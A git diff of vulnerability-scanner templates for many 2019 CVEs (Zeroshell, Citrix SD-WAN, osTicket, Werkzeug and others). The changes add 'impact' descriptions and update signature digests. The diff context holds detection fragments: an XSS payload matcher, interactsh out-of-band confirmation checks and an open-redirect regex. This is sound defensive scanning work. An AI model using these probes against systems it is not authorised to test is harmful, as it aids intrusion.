   description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken <img> tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.
+  impact: |
+    An attacker can trick an authenticated user into performing unintended actions on the phpMyAdmin application.
   remediation: |
     Upgrade phpMyAdmin to version 4.9.0 or later to mitigate the CSRF vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
         group: 1
         regex:
           - '\?v=([0-9.]+)'
-# digest: 4a0a0047304502203820c06b91ed4704f67ab9f488803db7b675b16a5629181e9b3a6772b47ff8dd022100affcafbb9b19e65c6b5648b47a45343b53a61c12f50955134aa5e77f86834b49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220485af2591042943803de68db8d560852691bb6b0d55f6a12bd7a174b220885c0022100b5066986c49e986818a29bf9a00fb819fa1740f3c835f055973e71305e179f82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml
index 5e7e4183ce..4b8595df6c 100644
--- a/http/cves/2019/CVE-2019-12725.yaml
+++ b/http/cves/2019/CVE-2019-12725.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0,akincibor
   severity: critical
   description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
   reference:
     - https://www.zeroshell.org/new-release-and-critical-vulnerability/
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100df7c063f19ca6ad8cbbb6af6a0eb951e2fcc9217a077f24cc8c7a6d8732afbde022100b8a9dd43d42acaedb88b0acdfd92ec9a6fc997c5a87917182eab22ae6089cfb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200174df461312da567ca4ee357e93d7cf58c2dfe1a8c200ed42303b6ead6754750220307fc103b033530a5bebf900233cb2b5e4879b8fe0aa700e0f00cfb8ff6ccf37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml
index 9afb7342cb..f1e2bdd800 100644
--- a/http/cves/2019/CVE-2019-12985.yaml
+++ b/http/cves/2019/CVE-2019-12985.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure.
   remediation: |
     Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100dfd6b4614fe4f5f97fd092a668b78c31d22242a413508936334ede5c1c95c18b022100bd0b1bfe641913906014a456174b2df0f3ce710f348fd79c93b8f35879e66adc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100879e6cb1e5f1af47aec87c81873e81214dd33b0fc6cfcfb4ec14bb23b5cae7d102206bdf93ffc3d666ce89eaf0a07249e5726238e2bf2d6bed227b30336905b34098:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml
index d393ad3044..067f58cf66 100644
--- a/http/cves/2019/CVE-2019-12986.yaml
+++ b/http/cves/2019/CVE-2019-12986.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure.
   remediation: |
     Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022100e6464ddf924fea6761161e99b700606247a6b1ced79156899e3f50bffe63821002202ed71cc19c6df730feada782f79ef418b49df4d6f1ff693103f70d7528beb178:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b814e8b862e565a610a0ee30696bf52d00ee849d9f0b1356ca25e324ac93c12202201708987b3fa1de2b52fd843caa91b5fbd0abdcccc5eca38221e5e4c723b38681:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml
index fcf8293c30..7fd626326c 100644
--- a/http/cves/2019/CVE-2019-12987.yaml
+++ b/http/cves/2019/CVE-2019-12987.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure.
   remediation: |
     Apply the latest security patches provided by Citrix to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022100b7f6068d7d2832dda99638b83c7d642eb83356e781da0cba6323359419aaebaf0220454d0fba2332d2511096d4e0b3f5a66493fb8a9b6903a4f7b0f0ef70993346b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220544380fa3d8006b8c7deb7211b8ab670bbf9ed724c0b6e2241c0dd8ff4f51114022100f12275e1040e5ca2ccec5b03aec0c6d4dd834bccadc453534777e437a406bc2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml
index 1c9ff8b9a6..ff3b0942b3 100644
--- a/http/cves/2019/CVE-2019-12988.yaml
+++ b/http/cves/2019/CVE-2019-12988.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password,  thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure.
   remediation: |
     Apply the latest security patches provided by Citrix to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a00463044022040b95307688df9bc1fb5b163bc9c956f4a033ca2e35fa154b44aea5debd6e22c022017122f572f50983eaf49d2181d6ed1ca2d676e8f9aaa044c26e2cc203705e6e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e8ea4e84a87e1e5460876bdaa809a6b84d21f77afe455eb67369ac6043750dd02206e22d1f12774f4c5e0a3d4175a5f6dbb2e8b49d8c12c62c7528748f4342b0741:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml
index 98eec556db..54e6e04379 100644
--- a/http/cves/2019/CVE-2019-12990.yaml
+++ b/http/cves/2019/CVE-2019-12990.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service.
   remediation: |
     Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - status_code_3 == 200
           - contains(body_1, "<title>Citrix SD-WAN</title>")
         condition: and
-# digest: 490a0046304402200c712c7a4ff1c1858a42543370ef1bb24fcaf92fa839357db81cd12f1425a3e502207f14f303e3500dd841c52479bfc8237c613293ae33d47a4393d08207ae0bf420:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f5337fb817cbd37cbeda16ffab873061c19b1940952bd44b039ba6ba6b3be4cb0220755b1feb374765955e68398f542c5611b84ca1eb1bad85bb38def6620b92f45d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml
index 13040fba30..6306d436ba 100644
--- a/http/cves/2019/CVE-2019-13101.yaml
+++ b/http/cves/2019/CVE-2019-13101.yaml
@@ -5,6 +5,8 @@ info:
   author: Suman_Kar
   severity: critical
   description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
   remediation: |
     Update the router's firmware to the latest version provided by D-Link.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a1b7594ef5f0316bd3208ae2ed73a1ab59083edfa5a27c4fda8874e741bc6f47022100f4afac636f6729de14f13e4704a29f23db761f3171f2a7bc6b9577d0bb6f7ecd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ec2f13b854bf27c8b3336db44b22160fbfdbc4b3eff270c08ec5f93ad6c72ed8022100aa00257d467d3cd9434c6138d1055ea399dfb80bdb6091173b89bda6e463f5a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml
index 67d0af59a1..84c0868349 100644
--- a/http/cves/2019/CVE-2019-13392.yaml
+++ b/http/cves/2019/CVE-2019-13392.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of MindPalette NateMail to fix the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: header
         words:
           - text/html
-# digest: 490a0046304402204b899e08326fa3c18d2a6a2707601f458f459ae818e54e15144626cebd5e895f02203a4e103c964d4069c3fb872f88b688ba75585be50f7a19330d8eea76dfd378bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206248044f39a9a33c70e894c0a554ddcbc22b91f129e791f34d523d3d681fd3a50220703551c351ac3f19651bbf8e023c10fbae9be2055178d7ba22e53393b642d2e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml
index be21c8c572..12a73fb076 100644
--- a/http/cves/2019/CVE-2019-13396.yaml
+++ b/http/cves/2019/CVE-2019-13396.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko,daffainfo
   severity: medium
   description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
+  impact: |
+    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
           - "idden' name='form_token' value='([a-z0-9]+)'>"
         internal: true
         part: body
-# digest: 4a0a004730450220106f7e4d3285ee1b816b2f9c803524a2a30f99fda2e174225ba84aa14de72aad022100a12fe278c8d9c32a3a40facd46a78ee902b996b5a1aecfb4c3cbb1d8b16f29e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201dff7b96f8106906bb8f7d7d7e7801fb77b12f5306f5ea1c2e3ee6bfe6ae091c0220266a60c3d0d0d7a4b42adec1121cd7122178017747559e25342e8e9e1905805c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml
index 1d1495c9ae..845b9724ae 100644
--- a/http/cves/2019/CVE-2019-13462.yaml
+++ b/http/cves/2019/CVE-2019-13462.yaml
@@ -5,6 +5,8 @@ info:
   author: divya_mudgal
   severity: critical
   description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
+  impact: |
+    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system.
   remediation: |
     Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a00483046022100e388a7f90b1013308f9be48dac859e107a959a9d4160f5e6f825f2720723012e0221008828df2eb2f8cab52e07afefbf83fc534314fc117387497f6d623dbcf638c081:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cabc6959d31f577540a9fe7e3b5d6bd9a157b225ddc85b706976db22dd0ef7ef022100ffc22dd2e7fa31ef70fe00e0dd886fa7c0e87e4ee5a1303a1b2384d93b89ed39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml
index b89644eb31..f80cc13da0 100644
--- a/http/cves/2019/CVE-2019-14205.yaml
+++ b/http/cves/2019/CVE-2019-14205.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
   remediation: |
     Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220737e1eab1b9e743df43fe587b403b78115ea9c5707c4b859656982bc03c2521b0220474b704a70baa8afa38acbde31c66bf32c65c1b19361b58908c109c97fbade86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d10b76a759bef969e93d6ecae9a329df980012d22036814e4822aeba7516bac6022100fe97b2c220abc56bc24c502e8280cff22e8a36ff9b7f3a50c180db3bc3c892e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml
index 27b64cfbaf..b97dd91e83 100644
--- a/http/cves/2019/CVE-2019-14223.yaml
+++ b/http/cves/2019/CVE-2019-14223.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
-# digest: 4b0a00483046022100c0326cf357c2129b8a9e14e5e19c54142a7e62fe7f1f1b67f50a6d83028c87b2022100e213e15f78e85196514ae01b523fa1334b6564f491be028c81c1576c2805f73e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202a67177769c9f7e1a76674b0131fdf57a6ded569a65668c50f4c7ec7d22d1690022100811d1424f56c9c721d224261dc1f147747f02878a1c165f1a6d60be2b97c83da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml
index 124c335029..f9d4e790b7 100644
--- a/http/cves/2019/CVE-2019-14251.yaml
+++ b/http/cves/2019/CVE-2019-14251.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ba2f136dc4709738fae142dab0569b81450ec75733be2a9a35000a684654a1c502204f0220c58824835f03f3973164f50f3fdc650429e639e78704adbbd443fd1200:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f007dd8069440271db0d1874ac916627582b96fe3b5edfd433f844c60d760826022021992f181734abeb89807b2ab0cfe91ffb0e7b8c1c47b85154104b1e11d00233:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml
index 3197ca9e93..9a3a862227 100644
--- a/http/cves/2019/CVE-2019-14312.yaml
+++ b/http/cves/2019/CVE-2019-14312.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Upgrade to a patched version of Aptana Jaxer or apply the necessary security patches to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210086ea433a10adcb2b673115627a2b46acfd9cb4fa3c43e7982fb55c3b9e8f21a8022100b7e247d454fca2fefab45d99ef7c20093deecf878b86395bc8136e74c4ca0da0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bd483d9317ac1813e138f3d46650d761372a75e3f36cb148d47d712531a93646022005cb7f9f206c4b6f08b029eda1ba05e41d2a0379091774e8da717dca11ee30a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml
index 366c04b991..9669cb0ead 100644
--- a/http/cves/2019/CVE-2019-14322.yaml
+++ b/http/cves/2019/CVE-2019-14322.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
   remediation: |
     Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210082025fece64fd78b90f525625fac64abd37a60ac1c9cf59ede813a6c52caa2620221009baa7e19d0adeb7b7f430c36c78f0c51e54e8a7a6405c6e65a8b1c1e7dadaa7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022005322eb0ebb5918de1d463fe9ec6fa51e014ab80f943f7784c10b9d541223913022100855798ac2a6a1e36cbd415b811b91ca74b906facf882f290ecc0eb0ad495e804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml
index e3572b6b13..0ecfd3be76 100644
--- a/http/cves/2019/CVE-2019-14470.yaml
+++ b/http/cves/2019/CVE-2019-14470.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100920760fa216b2c9d38e1738c6393e332c86c3b74ec8c59e0e7ba47fded4571a7022005dd56e0db938e4fd7d20eb3a6091f14e39b224e3cecc59fa2f092481a662864:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204ff2146bcf661e0d4cccbaae514d89cdb7f8928389fcd5289191afc3b1b6d13a02206bbf3280abafe6f898034c28455e4fd278d7f23abc2c9bc6de975d7c31271306:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml
index c920df8b03..ae235e166b 100644
--- a/http/cves/2019/CVE-2019-14530.yaml
+++ b/http/cves/2019/CVE-2019-14530.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
   remediation: |
     Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205701fbf4de547f18151e0f31e11ad2f3c1e8006202ebe4b4377d9e0d78fd5ef702200e306b77950825714497b7b9f61a7261fd449ae95ac1accdb71574eff7bf7176:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201984cfcaff8d48f77b599d9c470c54571e233027ccaa42b65960d5b6d13fb2dc022100eec2907d4896eb29a04694e15424e48e336e6a5d0f854741c5cf3ba844bde493:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml
index 2688edf177..0ab540fb0b 100644
--- a/http/cves/2019/CVE-2019-14696.yaml
+++ b/http/cves/2019/CVE-2019-14696.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022043d456a67348cbdb51046b49f483500d1f6f98012ff7e4db84305bbf105a2886022100f941637496bc6e4e421a1b3a3688d2052030db05537134534664cb9a3f53135d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f90ae11bb449affd9a24e83449addaee3ec1baff9e82a04b11716c5e172cda46022100a9ae18c51a1e82b82533ec972a39ca15842770251ff993b06390ca27c4484222:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml
index 0b4c579d02..4f04b29f73 100644
--- a/http/cves/2019/CVE-2019-14750.yaml
+++ b/http/cves/2019/CVE-2019-14750.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability.
   reference:
@@ -83,4 +85,4 @@ http:
         regex:
           - '__CSRFToken__" value="(.*?)"'
         internal: true
-# digest: 4b0a00483046022100c635065f7358ccdddddbcf3f267f763fb1392b97bdc3928b0972751df254a2af022100fe7dd9698acadac9fabae68b208da7e6c87c63ad50d780c5417ee1d444ebe6c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009c2964caf6e903ca3685cc10c9ac0141fe4e9ce9557d38857ad165bfe3f7eba6022100df7e7c8d5066af452d288496fb78a32d56949c81b13ef569b17489c6ce77aa63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml
index 11294f563f..4c1e0a4166 100644
--- a/http/cves/2019/CVE-2019-14789.yaml
+++ b/http/cves/2019/CVE-2019-14789.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
           - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
           - 'contains(body_2, "Custom 404 Pro")'
         condition: and
-# digest: 4b0a00483046022100cc51a5d73e6d8b113496f9c997a148a85e0a9ac56728dd2ae92a6ba61090a8f5022100edf598f0e845a221c4ef9f1ed21886e38ad9683ddd5bfc23d2ec2e3a6c7a1e16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022037b1df1234704dc3ea78794e73304f4a0441066990b1e3b9bd8942860b20b958022100879042183aaf455a7b154d26df4996a261dd6eb787311f35216fbee52b3b3f7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml
index 8661bfb6bd..a38c12c3df 100644
--- a/http/cves/2019/CVE-2019-14974.yaml
+++ b/http/cves/2019/CVE-2019-14974.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022070bd24afbdc3ce675203cbbe3172c62a41e0be9545ebfa3267aabe8b75312ece022100b4e419863ae0a506be06893da888853e1b5cec9516cefecdc5ccef23b2b77898:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b99830dc3daf12a956313ac766c732cf0c966c96740a0da8bb30703775f200d5022100a6d6d4fe014fdb57591ba1456eec0b18390e38771f68602355daa6ee8af24820:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml
index 16338efe4a..117cd2365b 100644
--- a/http/cves/2019/CVE-2019-15043.yaml
+++ b/http/cves/2019/CVE-2019-15043.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
+  impact: |
